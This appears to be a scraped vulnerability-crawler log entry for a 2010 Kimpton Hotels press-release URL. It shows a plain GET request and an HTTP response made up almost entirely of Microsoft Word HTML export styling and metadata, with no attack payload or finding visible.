2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}p.p12, li.p12, div.p12 {mso-style-name:p12; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MarlieseEngel {mso-style-name:"Marliese Engel"; mso-style-noshow:yes; mso-ansi-font-size:11.0pt; mso-bidi-font-size:11.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black; font-weight:normal; font-style:normal; text-decoration:none; text-underline:none; text-decoration:none; text-line-through:none;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1212839367; mso-list-type:hybrid; mso-list-template-ids:1587200068 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l12 {mso..
- /pdfs/press/html/Rub-0110/

/pdfs/press/html/Rub-0110/

http://www.kimptonhotels.com/pdfs/press/html/Rub-0110/

Request

GET /pdfs/press/html/Rub-0110/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Rub-0110/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29277
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>1</o:TotalTime>
<o:LastPrinted>2010-01-27T23:04:00Z</o:LastPrinted>
<o:Created>2010-01-27T23:04:00Z</o:Created>
<o:LastSaved>2010-01-27T23:04:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>625</o:Words>
<o:Characters>3564</o:Characters>
<o:Lines>29</o:Lines>
<o:Paragraphs>7</o:Paragraphs>
<o:CharactersWithSpaces>4376</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:77;
mso-generic-font-family:modern;
mso-font-format:other;
mso-font-pitch:fixed;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:77;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l3:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1030841178;
mso-list-type:hybrid;
